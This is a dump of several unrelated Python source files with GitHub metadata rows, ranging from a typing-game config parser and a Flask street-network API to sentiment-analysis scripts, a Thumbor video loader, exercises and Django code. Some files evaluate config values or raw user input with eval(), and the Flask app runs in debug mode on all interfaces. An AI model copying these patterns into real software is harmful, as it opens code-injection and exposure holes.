Finds the config dir for the system
$XDG_CONFIG_HOME > ~/.config > ~/
"""
try:
return Path.expanduser(Path(os.environ["XDG_CONFIG_HOME"]))
except KeyError:
home = Path.home()
config_dir = os.path.join(home, ".config")
if os.path.isdir(config_dir):
return Path(config_dir)
else:
return home
class Parser(ConfigParser):
"""
A sub class of ConfigParser class
to parse the currenty set options in the settings menu
"""
config_path = get_config_location() / "termtyper"
file_path = config_path / "termtyper.ini"
def __init__(self) -> None:
super().__init__()
if not self.read(self.file_path):
self._create_user_config()
else:
if len(self.sections()) == 1:
self.clear()
self._create_user_config()
def _create_user_config(self) -> None:
"""
Creates a new config
"""
if not self.config_path.is_dir():
os.mkdir(self.config_path)
print("No config found !\nCreating....")
with open(self.file_path, "w"):
pass
self.read_dict(CONF_DICT)
self._write_to_file()
def _add_default_config(self, section: str, option: str) -> None:
if section in CONF_DICT:
if option in CONF_DICT[section]:
self.set(section, option, str(CONF_DICT[section][option]))
else:
raise NoOptionError(option, section)
else:
raise NoSectionError(section)
def get(self, section: str, option: str, **kwargs) -> str:
"""
Override the get method to add the default value if data doesn't exist
"""
try:
return super().get(
section,
option,
raw=kwargs.get("raw", True),
vars=kwargs.get("vars", None),
)
except NoOptionError:
self._add_default_config(section, option)
return super().get(
section,
option,
raw=kwargs.get("raw", True),
vars=kwargs.get("vars", None),
)
def toggle_numbers(self):
numbers = self.get("paragraph", "numbers")
self.set("paragraph", "numbers", "True" if str(numbers) == "False" else "False")
def toggle_punctuations(self):
punctuations = self.get("paragraph", "punctuations")
self.set(
"paragraph",
"punctuations",
"True" if str(punctuations) == "False" else "False",
)
def set(self, section: str, option: str, value: str | None = None) -> None:
super().set(section, option, value)
self._write_to_file()
def set_speed(self, speed: SpeedType, value: NumberType) -> None:
mode = self.get("mode", "writing mode")
if mode == "words":
paragraph_size = self.get_data("paragraph_size")
self.set("speed records word", f"{paragraph_size}_{speed}", str(value))
else:
timeout = int(self.get_data("timeout"))
self.set("speed records time", f"{timeout}_{speed}", str(value))
def get_speed(self, speed: SpeedType) -> float:
mode = self.get("mode", "writing mode")
if mode == "words":
paragraph_size = self.get_data("paragraph_size")
return float(self.get("speed records word", f"{paragraph_size}_{speed}"))
else:
timeout = int(self.get_data("timeout"))
return float(self.get("speed records time", f"{timeout}_{speed}"))
def get_theme(self, data: str):
return self.get("theming", data)
def set_theme(self, data: str, value: Any):
return self.set("theming", data, str(value))
def get_para_setting(self, data: str) -> bool:
return eval(self.get("paragraph", data))
def set_para_setting(self, data: str, value: Any):
return self.set("paragraph", data, str(value))
def _write_to_file(self) -> None:
with open(self.file_path, "w") as fp:
self.write(fp)
def get_data(self, data: str) -> str:
return self.get("user", data)
MAIN_PARSER = Parser()
| kraanzu/termtyper | termtyper/utils/parser.py | parser.py | py | 5,815 | python | en | code | 975 | github-code | 13 |
20056839286 | from dnd_bot.logic.prototype.entity import Entity
class Corpse(Entity):
entity_name = "Corpse"
sprite_path = "dnd_bot/assets/gfx/entities/corpse.png"
def __init__(self, x=0, y=0, game_token="", creature_name="", dropped_money=0, dropped_items=None, sprite_path=None):
"""creates corpse entity with default sprite, but you can pass path to other sprite"""
if dropped_items is None:
dropped_items = []
if sprite_path is not None:
Corpse.sprite_path = sprite_path
super().__init__(x=x, y=y, game_token=game_token, name=Corpse.entity_name, sprite=Corpse.sprite_path, fragile=True)
self.dropped_money = dropped_money
self.dropped_items = dropped_items
self.creature_name = creature_name
| esoviscode/discord-dnd-bot | dnd-bot/dnd_bot/logic/prototype/entities/misc/corpse.py | corpse.py | py | 778 | python | en | code | 4 | github-code | 13 |
33484738152 | #Write a program to check whether the no is Armstrong or not
a=eval(input("enter the no\n"))
s=a
result=0
while a > 0:
num = a % 10
result = result + num**(3)
a = int(a/10)
if(s==result):
print(s,"is amstrong no")
else:
print(s,"is not a amstrong no")
| snehasurna1875/100-days-of-code | Day-39/Amstrongno.py | Amstrongno.py | py | 275 | python | en | code | 0 | github-code | 13 |
31942722448 | from flask import Flask, Response
from flask import jsonify, request
import os.path
import osmnx as ox
from networkx.readwrite import json_graph
app = Flask(__name__)
def root_dir(): # pragma: no cover
return os.path.abspath(os.path.dirname(__file__))
def get_file(filename): # pragma: no cover
try:
src = os.path.join(root_dir(), filename)
return open(src).read()
except IOError as exc:
return str(exc)
# ------------------------------------------------
# /
# ------------------------------------------------
@app.route('/')
def index():
return 'Street Network Analysis'
# ------------------------------------------------
# /basic_stats_from_point
# ------------------------------------------------
@app.route('/basic_stats_from_point', methods=['POST'])
def basic_stats_from_point():
values = request.get_json()
latitude = values.get('latitude')
longitude = values.get('longitude')
network_type = values.get('network_type')
if network_type is None:
return "Error, please supply a valid network_type", 400
print(latitude, longitude)
print(network_type)
coord = (latitude, longitude)
G = ox.graph_from_point(coord, network_type=network_type)
basic_stats = ox.basic_stats(G)
# ox.save_graphml(G, filename="graph_from_location.graphml", folder="/app")
# content = get_file('graph_from_location.graphml')
return Response(basic_stats, mimetype="application/json")
# ------------------------------------------------
# /graph_from_point
# ------------------------------------------------
@app.route('/graph_from_point', methods=['POST'])
def graph_from_point():
values = request.get_json()
latitude = values.get('latitude')
longitude = values.get('longitude')
network_type = values.get('network_type')
if network_type is None:
return "Error, please supply a valid network_type", 400
print(latitude, longitude)
print(network_type)
coord = (latitude, longitude)
G = ox.graph_from_point(coord, network_type=network_type)
ox.save_graphml(G, filename="graph_from_location.graphml", folder="/app/output")
content = get_file('output/graph_from_location.graphml')
return Response(content, mimetype="application/xml")
# ------------------------------------------------
# /graph_from_place
# ------------------------------------------------
@app.route('/graph_from_place', methods=['POST'])
def graph_from_place():
values = request.get_json()
location = values.get('location')
network_type = values.get('network_type')
print(location)
print(network_type)
if location is None:
return "Error, please supply a valid location", 400
if network_type is None:
return "Error, please supply a valid network_type", 400
G = ox.graph_from_place(location, network_type=network_type)
ox.save_graphml(G, filename="graph_from_place.graphml", folder="/app/output")
#jdata = json_graph.tree_data(G,root=1)
#graphml_json = json_graph.tree_graph(jdata)
#return jsonify(graphml_json), 200
# return 'ok', 200
content = get_file('output/graph_from_place.graphml')
return Response(content, mimetype="application/xml")
# ------------------------------------------------
# app run
# ------------------------------------------------
if __name__ == '__main__':
app.run(debug=True,host='0.0.0.0', port=5000)
| cosmycx/fdns-ms-snxa | app.py | app.py | py | 3,508 | python | en | code | 0 | github-code | 13 |
219552643 | """
import sys
# sys.stdin = open("input.txt", 'r')
if __name__ == "__main__":
n = int(input())
arr = list(map(int, input().split()))
memo = [1] * (n)
for i in range(1, n):
maximum = 1
idx = 0
for j in range(i - 1, -1, -1):
if arr[j] < arr[i]:
if memo[j] + 1 > maximum:
maximum = memo[j] + 1
idx = j
memo[i] = maximum
pos = idx
print(max(memo))
"""
import sys
# sys.stdin = open("input.txt", 'r')
if __name__ == "__main__":
n = int(input())
arr = list(map(int, input().split()))
memo = [0] * n
result = 0
for i in range(1, n):
max = 0
for j in range(i - 1, -1, -1):
if arr[j] < arr[i] and memo[j] > max:
max = memo[j]
memo[i] = max + 1
if memo[i] > result:
result = memo[i]
print(result) | ignis535/baekjoon | 동적계획법/최대 부분 증가수열.py | 최대 부분 증가수열.py | py | 915 | python | en | code | 0 | github-code | 13 |
12983887589 | import re
import os
from urllib import unquote
from functools import partial
from tempfile import NamedTemporaryFile
from thumbor.loaders import LoaderResult
from tornado.process import Subprocess
from thumbor.utils import logger
from wikimedia_thumbor_base_engine import BaseWikimediaEngine
uri_scheme = 'http://'
def should_run(url):
unquoted_url = unquote(url)
if re.search(r'\.(ogv|webm)$', unquoted_url, re.I):
return True
return False
def load_sync(context, url, callback):
# Disable storage of original. These lines are useful if
# you want your Thumbor instance to store all originals persistently
# except video frames.
#
# from thumbor.storages.no_storage import Storage as NoStorage
# context.modules.storage = NoStorage(context)
unquoted_url = unquote(url)
command = BaseWikimediaEngine.wrap_command([
context.config.FFPROBE_PATH,
'-v',
'error',
'-show_entries',
'format=duration',
'-of',
'default=noprint_wrappers=1:nokey=1',
'%s%s' % (uri_scheme, unquoted_url)
], context)
logger.debug('Command: %r' % command)
process = Subprocess(command, stdout=Subprocess.STREAM)
process.set_exit_callback(
partial(
_parse_time_status,
context,
unquoted_url,
callback,
process
)
)
def _parse_time_status(context, url, callback, process, status):
if status != 0:
result = LoaderResult()
result.successful = False
callback(result)
else:
process.stdout.read_until_close(
partial(
_parse_time,
context,
url,
callback
)
)
def _parse_time(context, url, callback, output):
duration = float(output)
unquoted_url = unquote(url)
try:
seek = int(context.request.page)
except AttributeError:
seek = duration / 2
destination = NamedTemporaryFile(delete=False)
command = BaseWikimediaEngine.wrap_command([
context.config.FFMPEG_PATH,
# Order is important, for fast seeking -ss has to come before -i
# As explained on https://trac.ffmpeg.org/wiki/Seeking
'-ss',
'%d' % seek,
'-i',
'%s%s' % (uri_scheme, unquoted_url),
'-y',
'-vframes',
'1',
'-an',
'-f',
'image2',
'-nostats',
'-loglevel',
'error',
destination.name
], context)
logger.debug('Command: %r' % command)
process = Subprocess(command)
process.set_exit_callback(
partial(
_process_output,
callback,
destination.name
)
)
def _process_output(callback, destination_name, status):
result = LoaderResult()
if status != 0:
result.successful = False
else:
result.successful = True
with open(destination_name, 'rb') as f:
result.buffer = f.read()
os.remove(destination_name)
callback(result)
| wikimedia/thumbor-video-loader | wikimedia_thumbor_video_loader/__init__.py | __init__.py | py | 3,111 | python | en | code | 0 | github-code | 13 |
32826185805 | import math
def is_prime(n):
for num in range(2, int(math.sqrt(n)) + 1):
if n % num == 0:
return False
return True
def prime_factors(n):
result = ""
number = n
if n == 1:
return "(1)"
for num in range(2, n):
count = 0
while number % num == 0:
count += 1
number = int(number / num)
if count > 0:
result += ("({}**{})".format(num, count) if count > 1 else "({})".format(num))
if number == 1:
return result
if is_prime(number):
result += ("({})".format(number))
return result
return result if result else "({})".format(n)
print(prime_factors(1245)) | RealMrSnuggles/Python | CodeWars/Primes in numbers.py | Primes in numbers.py | py | 743 | python | en | code | 0 | github-code | 13 |
37844902665 |
import openpyxl
def excel_writer(data, path):
# data: {sheet_name: tuple of tuple(rows)}
wb = openpyxl.Workbook()
for sheet_name in data:
ws = wb.create_sheet(sheet_name)
for row in data[sheet_name]:
ws.append(row)
del wb["Sheet"]
wb.save(path)
data = {"sheet1": ((1,2),(3,4))}
out_dir = "test.xlsx"
excel_writer(data, out_dir) | RoyalSkye/AGH | Improvement_based/decomposition_cplex/excel_test.py | excel_test.py | py | 378 | python | en | code | 13 | github-code | 13 |
26135171161 | from textblob import TextBlob
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from pycorenlp import StanfordCoreNLP
from helper_functions import *
import pickle
import logging
from time import time
from multiprocessing.dummy import Pool as ThreadPool
from AOP import *
import unittest
'''
install:
pip install wget
pip install pycorenlp
wget http://nlp.stanford.edu/software/stanford-corenlp-full-2016-10-31.zip
unzip stanford-corenlp-full-2016-10-31.zip
source: http://stackoverflow.com/questions/32879532/stanford-nlp-for-python
start server cmd:
cd C:\Windows\System32\corenlp-python\stanford-corenlp-full-2016-10-31
java -mx5g -cp "*" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9001
'''
core_nlp = StanfordCoreNLP('http://localhost:9001')
def get_sentiment_coreNLP(text, print_result=False, core_nlp= core_nlp):
res = core_nlp.annotate(text,
properties={
'annotators': 'sentiment',
'outputFormat': 'json',
'timeout': 100,
})
sentiments = []
for s in res["sentences"]:
score = float(s["sentimentValue"])/4
sentiments.append(score)
if len(sentiments) == 1:
return sentiments[0]
if print_result:
for s in res["sentences"]:
print ("%d: '%s': %s %s" % (
s["index"],
" ".join([t["word"] for t in s["tokens"]]),
s["sentimentValue"], s["sentiment"]))
return sentiments
def get_sentence_sentiment_coreNLP(text, core_nlp= core_nlp):
res = core_nlp.annotate(text,
properties={
'annotators': 'sentiment',
'outputFormat': 'json',
'timeout': 10000,
})
sentence_sentiments = []
print(res["sentences"])
try:
for s in res["sentences"]:
sentence = " ".join([t["word"] for t in s["tokens"]])
sentence_sentiments.append([sentence, int(s["sentimentValue"])])
except Exception:
logging.warn('failed to get sentiment value for text: %s' % text)
pass
return sentence_sentiments
def get_average_sentiment_coreNLP(text, core_nlp= core_nlp):
try:
res = core_nlp.annotate(text,
properties={
'annotators': 'tokenize,ssplit,sentiment',
'outputFormat': 'json',
'timeout': 100000,
})
sentiments = []
for s in res["sentences"]:
sentence = []
for token in s["tokens"]:
sentence.append(token['word'])
score = float(s["sentimentValue"])/4
sentiments.append(score)
return sum(sentiments) / len(sentiments)
except Exception:
return 0.5
def get_senitment_textblob(text):
testimonial = TextBlob(text)
return (testimonial.sentiment.polarity+1) / 2
def get_sentiment_vader(text):
vaderAnalyzer = SentimentIntensityAnalyzer()
scores = vaderAnalyzer.polarity_scores(text)
#dictkeys: neg(negative), neu(neutral) and pos(positive)
return scores["neu"] * 0.5 + scores["pos"]
def get_dict_acc( dictionary):
overall = [0.0, 0]
for key in dictionary:
overall[0] += dictionary[key][0]
overall[1] += dictionary[key][1]
return round(overall[0]/overall[1],4)
@timing
def compare_sentiment_analysis(reviews, business_id2business, output_file = "data/compare_sentiment_analysis.txt"):
textblob2acc = dict()
vader2acc = dict()
corenlp2acc = dict()
textblob2error = dict()
vader2error = dict()
corenlp2error = dict()
reviews.reverse()
time1 = time()
for review in reviews:
if review["business_id"] not in textblob2acc:
textblob2acc[review["business_id"]] = [0.0, 0]
vader2acc[review["business_id"]] = [0.0, 0]
corenlp2acc[review["business_id"]] = [0.0, 0]
textblob2error[review["business_id"]] = [0.0, 0]
vader2error[review["business_id"]] = [0.0, 0]
corenlp2error[review["business_id"]] = [0.0, 0]
textblob2acc[review["business_id"]][1] += 1
vader2acc[review["business_id"]][1] += 1
corenlp2acc[review["business_id"]][1] += 1
textblob2error[review["business_id"]][1] += 1
vader2error[review["business_id"]][1] += 1
corenlp2error[review["business_id"]][1] += 1
score = (float(review["stars"]) - 1.0) / 4
text = review["text"]
textblob_score = get_senitment_textblob(text)
if abs(score - textblob_score) <= 0.125:
textblob2acc[review["business_id"]][0] += 1
textblob2error[review["business_id"]][0] += abs(score - textblob_score)
vader_score = get_sentiment_vader(text)
if abs(score - vader_score) <= 0.125:
vader2acc[review["business_id"]][0] += 1
vader2error[review["business_id"]][0] += abs(score - vader_score)
core_nlp_score = get_average_sentiment_coreNLP(text)
if abs(score - core_nlp_score) <= 0.125:
corenlp2acc[review["business_id"]][0] += 1
corenlp2error[review["business_id"]][0] += abs(score - core_nlp_score)
if (time() - time1) > 3600:
break
with open(output_file, "a") as f:
accs = [textblob2acc, vader2acc, corenlp2acc,textblob2error,vader2error,corenlp2error]
print_str = "Business Name\tTextblob Accuracy\tVader Accuracy\tCoreNLP Accuracy\tTextblob Error\tVader Error\tCoreNLP Error"
print(print_str)
f.write(print_str + "\n")
for business_id in textblob2acc:
if business_id not in business_id2business:
continue
print_str = business_id2business[business_id]["name"]
for acc in accs:
print_str+= "\t" + str(round(acc[business_id][0]/acc[business_id][1],4))
print(print_str)
f.write(print_str + "\n")
print_str = "Overall"
for acc in accs:
print_str += "\t" + str(get_dict_acc(acc))
print(print_str)
f.write(print_str + "\n")
def add_sentences_to_reviews(reviews, port = 9000):
core_nlp = StanfordCoreNLP('http://localhost:' + str(reviews[1]))
try:
for review in reviews[0]:
if "sentences" not in review:
review["sentences"] = get_sentence_sentiment_coreNLP(review["text"], core_nlp = core_nlp)
elif review["sentences"] is []:
review["sentences"] = get_sentence_sentiment_coreNLP(review["text"], core_nlp = core_nlp)
except Exception:
pass
return reviews
@timing
def add_sentences_to_reviews_multithreaded(reviews,numberOfThreads = 4):
step = len(reviews) // numberOfThreads
split_reviews = [(reviews[step * i:step * (i + 1)], i + 9001) for i in range(numberOfThreads)]
pool = ThreadPool(numberOfThreads)
results = pool.map(add_sentences_to_reviews, split_reviews)
return results
def coreNLP_sentiment_by_word(text, average=False):
words = process_words(text, "en", stem=True)
ratings = [0] * 5
for word in words:
try:
res = core_nlp.annotate(word,
properties={
'annotators': 'sentiment',
'outputFormat': 'json',
'timeout': 100,
})
for s in res["sentences"]:
ratings[int(s["sentimentValue"])] += 1
except Exception:
pass
if average:
total = np.sum(ratings)
if total == 0:
return 2
rating_average = 0.0
for i in range(len(ratings)):
rating_average += i * ratings[i]
return rating_average/total
else:
return np.argmax(ratings)
class TddSentimentAnalysis(unittest.TestCase):
def test_positive_sentences_classified_incorectly(self):
sentences = [('''My favorite part about this property is the casino ,
especially the poker room ,
which is located right in front of the hotel ,
and it 's big enough to accommodate enough people than almost all of the other poker rooms on the strip .''',3),
("I heart this poker room and the casino here is HUGE !",4),
("I stayed at the Aria after getting a great deal for a 2 night stay .",3),
('''Our room looked out on the Vdara and not the strip ,
but still provided a great view .''',3),
("bathrooms - awesome .",4)]
errors = [0.0] * 3
for sentence in sentences:
text = sentence[0]
rating = sentence[1]
textblob_score = get_senitment_textblob(text) * 4
vader_score = get_sentiment_vader(text) * 4
word_coreNLP = coreNLP_sentiment_by_word(text,average=True)
errors[0] += abs(rating-textblob_score)
errors[1] += abs(rating - vader_score)
errors[2] += abs(rating - word_coreNLP)
self.assertLess(np.min(errors),len(sentences)*0.7)
def test_sentences_classified_corectly(self):
sentences = [("pool area - meh .",2),
("4 stars because the evening front desk was n't as helpful and the morning shift .",1),
("Look maybe these things are small , but to have to stop and call the front the desk is annoying .",1),
("Overall experience was very good .",4),
("Aria has a tram that will take you over to the Bellagio .",3)]
errors = [0.0] * 3
for sentence in sentences:
text = sentence[0]
rating = sentence[1]
textblob_score = get_senitment_textblob(text) * 4
vader_score = get_sentiment_vader(text) * 4
word_coreNLP = coreNLP_sentiment_by_word(text,average=True)
errors[0] += abs(rating-textblob_score)
errors[1] += abs(rating - vader_score)
errors[2] += abs(rating - word_coreNLP)
self.assertLess(np.min(errors), len(sentences) * 0.7)
if __name__ == '__main__':
categories = ["Hotels"]
for category in categories:
print(category)
with open("data/Las_Vegas-" + category + ".p", "rb") as f:
all_reviews, business_id2business, user_id2user = pickle.load(f)
compare_sentiment_analysis(all_reviews, business_id2business,"data/"+category+"_compare_sentiment_analysis.txt")
unittest.main()
| AndreiIacob/SuperView | src/SentimentAnalysis.py | SentimentAnalysis.py | py | 11,071 | python | en | code | 1 | github-code | 13 |
40268625031 | from utils import time_to_int
import numpy as np
import os
import pandas as pd
import pdb
class FeatureExtractor:
def __init__(self, limit_order_filename, feature_filename,
time_interval, n_level):
self.limit_order_filename = limit_order_filename
self.limit_order_df = None
self.feature_filename = feature_filename
self.time_interval = time_interval
self.n_level = n_level
self.delimiter_indices = []
self.time_interval_indices = []
def extract_features(self):
"""Extract features from limit order book."""
if not os.path.isfile(self.feature_filename):
self.limit_order_df = pd.read_excel(self.limit_order_filename)
# index starting from the valid level
self.delimiter_indices = self.get_delimiter_indices()
print("len delimiter_indices", len(self.delimiter_indices))
# index at the end of every interval
self.time_interval_indices = (np.array(self.get_time_interval_indices()) - 1).tolist()
basic_set, timestamps, mid_prices = self.extract_basic_set()
time_insensitive_set = self.extract_time_insensitive_set(basic_set)
labels = self.get_mid_price_labels(mid_prices)
self.save_feature_json(self.feature_filename, timestamps, basic_set,
time_insensitive_set, labels, mid_prices)
df = pd.read_json(self.feature_filename, orient="records", lines="True")
timestamps = df["timestamps"].tolist()
basic_set = df["basic_set"].tolist()
time_insensitive_set = df["time_insensitive_set"].tolist()
labels = df["labels"].tolist()
return np.array(timestamps), np.array(basic_set), \
np.array(time_insensitive_set), np.array(labels)
def extract_basic_set(self):
"""Extract basic set."""
limit_book_indices = np.array(self.delimiter_indices)[self.time_interval_indices].tolist()
assert(len(limit_book_indices) > 0)
timestamps = []
basic_set = []
mid_prices = []
init_time = self.get_init_time(limit_book_indices)
init_index = self.time_interval_indices[0]
for i in limit_book_indices:
timestamps.append(init_time)
init_time = init_time + self.time_interval
v1 = []
for index in range(i + 1, i + 1 + self.n_level):
v1.append([self.limit_order_df["ASK_PRICE"][index],
self.limit_order_df["ASK_SIZE"][index],
self.limit_order_df["BID_PRICE"][index],
self.limit_order_df["BID_SIZE"][index]])
# append the max mid-price in the interval
max_mid_price = 0
while np.array(self.delimiter_indices)[init_index] <= i:
max_mid_price = max(max_mid_price, (self.limit_order_df["ASK_PRICE"][np.array(self.delimiter_indices)[init_index]+1]\
+ self.limit_order_df["BID_PRICE"][np.array(self.delimiter_indices)[init_index]+1])/2)
init_index = init_index + 1
mid_prices.append(max_mid_price)
basic_set.append(np.array(v1).reshape(1, -1).tolist()[0])
return basic_set, timestamps, mid_prices
def extract_time_insensitive_set(self, basic_set):
"""Extract time insensitive features."""
time_insensitive_set = []
for v1 in basic_set:
v1 = np.array(v1).reshape(self.n_level, -1)
v2 = self.get_time_insensitive_v2(v1)
v3 = self.get_time_insensitive_v3(v1)
v4 = self.get_time_insensitive_v4(v1)
v5 = self.get_time_insensitive_v5(v1)
time_insensitive_feature = v2 + v3 + v4 + v5
time_insensitive_set.append(time_insensitive_feature)
return time_insensitive_set
def get_delimiter_indices(self):
"""Get all valid D's indices in the limit order book"""
delimiter_indices = [-1] # assume there is a D before index 0
for i in range(len(self.limit_order_df["DELIMITER"])):
if self.limit_order_df["DELIMITER"][i] == "D":
delimiter_indices.append(i)
guarantee_index = self.check_n_level(delimiter_indices)
return delimiter_indices[guarantee_index:-1]
def check_n_level(self, delimiter_indices):
"""Find the first index in delimiter indices that satisfies the desired level."""
guaranteed_index = 0
for i in range(len(delimiter_indices) - 1):
count = 0
if delimiter_indices[i + 1] - delimiter_indices[i] < self.n_level:
guaranteed_index = i + 1
continue
for index in range(delimiter_indices[i] + 1, delimiter_indices[i + 1]):
if self.limit_order_df["BID_SIZE"][index] * self.limit_order_df["ASK_SIZE"][index] > 0:
count += 1
if count == self.n_level:
break
else:
if count < self.n_level:
guaranteed_index = i + 1
print("guaranteed_index: ", guaranteed_index)
return guaranteed_index
def get_time_interval_indices(self):
"""Find all D's indices in delimiter indices for time intervals."""
next_timestamp = self.get_start_timestamp()
time_interval_indices = []
current_index = 0
while current_index != -1:
time_interval_index = self.get_time_interval_index(next_timestamp, current_index)
if time_interval_index == -1:
break
time_interval_indices.append(time_interval_index)
current_index = time_interval_index
next_timestamp += self.time_interval
return time_interval_indices
def get_time_interval_index(self, timestamp, current_index):
"""Find the first state for the desired timestamp."""
for i in range(current_index, len(self.delimiter_indices)):
index = self.delimiter_indices[i] + 1
try:
current_timestamp = time_to_int(self.limit_order_df["Time"].iloc[index])
except:
print(self.delimiter_indices[i])
print(index)
exit(1)
if current_timestamp == timestamp:
return i
elif current_timestamp > timestamp:
return i - 1
return -1
def get_start_timestamp(self):
"""Find the first timestamp in int."""
assert(len(self.delimiter_indices) > 0)
guaranteed_index = self.delimiter_indices[0] + 1
print("Start timestamp:", self.limit_order_df["Time"].iloc[guaranteed_index])
guaranteed_timestamp = time_to_int(self.limit_order_df["Time"].iloc[guaranteed_index])
if guaranteed_timestamp % self.time_interval == 0:
start_timestamp = guaranteed_timestamp
else:
start_timestamp = self.time_interval * ((guaranteed_timestamp / self.time_interval) + 1)
print("Start timestamp int:", start_timestamp)
return start_timestamp
def get_init_time(self, limit_book_indices):
if limit_book_indices[0] == -1:
init_time_index = 0
else:
init_time_index = limit_book_indices[0]
init_time = time_to_int(self.limit_order_df["Time"][init_time_index]) \
if time_to_int(self.limit_order_df["Time"][init_time_index]) % self.time_interval == 0 \
else self.time_interval * ((time_to_int(self.limit_order_df["Time"][init_time_index])
/ self.time_interval) + 1)
return init_time
@staticmethod
def get_time_insensitive_v2(v1):
"""Get v2 from v1."""
v2 = [[v1_i[0] - v1_i[2], (v1_i[0] + v1_i[2])/2] for v1_i in v1]
return [var for v2_i in v2 for var in v2_i]
@staticmethod
def get_time_insensitive_v3(v1):
"""Get v3 from v1."""
v3 = [[v1[-1][0] - v1[0][0], v1[0][2] - v1[-1][2],
abs(v1[i][0] - v1[i - 1][0]), abs(v1[i][2] - v1[i - 1][2])]
for i in range(len(v1)) if i > 0]
return [var for v3_i in v3 for var in v3_i]
@staticmethod
def get_time_insensitive_v4(v1):
"""Get v4 from v1."""
p_ask = [v1_i[0] for v1_i in v1]
v_ask = [v1_i[1] for v1_i in v1]
p_bid = [v1_i[2] for v1_i in v1]
v_bid = [v1_i[3] for v1_i in v1]
return [sum(p_ask)/len(p_ask), sum(p_bid)/len(p_bid),
sum(v_ask)/len(v_ask), sum(v_bid)/len(v_bid)]
@staticmethod
def get_time_insensitive_v5(v1):
"""Get v5 from v1."""
p_ask_p_bid = [v1_i[0] - v1_i[2] for v1_i in v1]
v_ask_v_bid = [v1_i[1] - v1_i[3] for v1_i in v1]
return [sum(p_ask_p_bid), sum(v_ask_v_bid)]
@staticmethod
def get_mid_price_labels(mid_prices):
"""Get the labels"""
gt = [0] # let the start label be 0
if len(mid_prices) == 1:
return gt
for i in range(1, len(mid_prices)):
if mid_prices[i] - mid_prices[i - 1] > 0:
gt.append(1)
else:
gt.append(0)
return gt
@staticmethod
def save_feature_json(feature_filename, timestamps, basic_set,
time_insensitive_set, labels, mid_prices):
"""Save the json."""
feature_dict = {"timestamps": timestamps, "basic_set": basic_set,
"time_insensitive_set": time_insensitive_set,
"labels": labels, "mid_pices": mid_prices}
df = pd.DataFrame(data=feature_dict, columns=["timestamps", "basic_set",
"time_insensitive_set",
"labels", "mid_prices"])
df.to_json(path_or_buf=feature_filename, orient="records", lines=True)
| ChenZheng-Zero/OrderBook_ML | feature_extractor.py | feature_extractor.py | py | 9,994 | python | en | code | 1 | github-code | 13 |
1320650346 | '''
Your task is to convert a number between 1 and 31 to a sequence of actions in the secret handshake.
The sequence of actions is chosen by looking at the rightmost five digits of the number once it's been converted to binary. Start at the right-most digit and move left.
The actions for each number place are:
00001 = wink
00010 = double blink
00100 = close your eyes
01000 = jump
10000 = Reverse the order of the operations in the secret handshake.
'''
def commands(binary_str):
actions = ["wink", "double blink", "close your eyes", "jump"]
result = []
for i in range(4, 0, -1):
if binary_str[i] == "1":
result.append(actions[4-i])
if binary_str[0] == "1":
result = list(reversed(result))
return result | antmrgn/100-days-of-devops | Python/exercism/40-secret_handshake.py | 40-secret_handshake.py | py | 756 | python | en | code | 1 | github-code | 13 |
70872787857 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('fullName', models.CharField(max_length=50)),
('phoneNumber', models.CharField(blank=True, max_length=10, validators=[django.core.validators.RegexValidator(b'^[0-9]*$', b'Only 0-9 allowed', b'Invalid Number')])),
('website', models.URLField(verbose_name=b'Website', blank=True)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, unique=True)),
],
),
]
| bitsnbytes7c8/django-site | user_profile/migrations/0001_initial.py | 0001_initial.py | py | 973 | python | en | code | 0 | github-code | 13 |
5945187963 | #Dylan Miller
#Uses the TwoStack class to implement a queue where the first item
#in is the first one out
#imports the TwoStacks class
from Lab01TwoStacks import *
#creates a Queue class that can add items to the back of the queue
#and remove items from the front
class Queue(TwoStacks):
"""class that can add items to the back of the queue
and remove items from the front"""
#n - saves the maximum length of the entire array (both stacks combined)
#self.array - stores both stacks as a list
#self.len1 & self.len2 - tracks the length of each individual stack
def __init__(self,n):
self.maxLen = n
self.array = []
self.len1 = 0
self.len2 = 0
#returns the length of the queue
def length(self):
"""returns the length of the queue"""
return int(len(self.array))
#pushes and item to the head of the queue which will reverse order
#when we need to dequeue from the stack
def enqueue(self,item):
"""pushes and item to the back of the queue"""
self.push(1,item)
#dequeues the first item that was added to the queue
def dequeue(self):
"""dequeues the first item that was added to the queue"""
#moves everything from stack1 to stack2, thus reversing the order
for i in range(self.height(1)):
copy = self.pop(1)
self.push(2,copy)
#pops from the top of the new reversed stack
#to get the first item that was queued
item = self.pop(2)
#moves everything from stack2 back to 1 to reset the queue
for i in range(self.height(2)):
copy = self.pop(2)
self.push(1,copy)
return item
def __str__(self):
array = ""
for i in self.array:
array = array+str(i)+" "
return str(array)
| dylmill8/Python-Programming | ATCS/Lab01/Lab01Queue.py | Lab01Queue.py | py | 1,837 | python | en | code | 0 | github-code | 13 |
14095597448 | from django import template
from django.template.base import token_kwargs
from feincms3_cookiecontrol.embedding import embed, wrap
from feincms3_cookiecontrol.models import cookiecontrol_data
register = template.Library()
@register.inclusion_tag("feincms3_cookiecontrol/banner.html")
def feincms3_cookiecontrol(*, hide_modify_button=False, privacy_policy_url=None):
data = cookiecontrol_data(privacy_policy_url=privacy_policy_url)
if hide_modify_button:
data.pop("buttonModify")
return {"data": data}
class ConsciousWrapNode(template.Node):
def __init__(self, provider, nodelist, kw):
self.provider = template.Variable(provider)
self.nodelist = nodelist
self.kw = kw
def render(self, context):
return wrap(
self.provider.resolve(context),
self.nodelist.render(context),
**{key: value.resolve(context) for key, value in self.kw.items()},
)
@register.tag(name="wrap")
def do_wrap(parser, token):
try:
tag_name, provider, *bits = token.split_contents()
except ValueError as exc:
raise template.TemplateSyntaxError(
"%r tag requires exactly one argument", str(token.contents).split()[0]
) from exc
kw = token_kwargs(bits, parser)
nodelist = parser.parse(("endwrap",))
parser.delete_first_token()
return ConsciousWrapNode(provider, nodelist, kw)
@register.simple_tag(name="embed")
def do_embed(url):
return embed(url)
| feinheit/feincms3-cookiecontrol | feincms3_cookiecontrol/templatetags/feincms3_cookiecontrol.py | feincms3_cookiecontrol.py | py | 1,495 | python | en | code | 8 | github-code | 13 |
34608122595 | # Задание №7
# ✔ Создайте функцию для сортировки файлов по директориям:
# видео, изображения, текст и т.п.
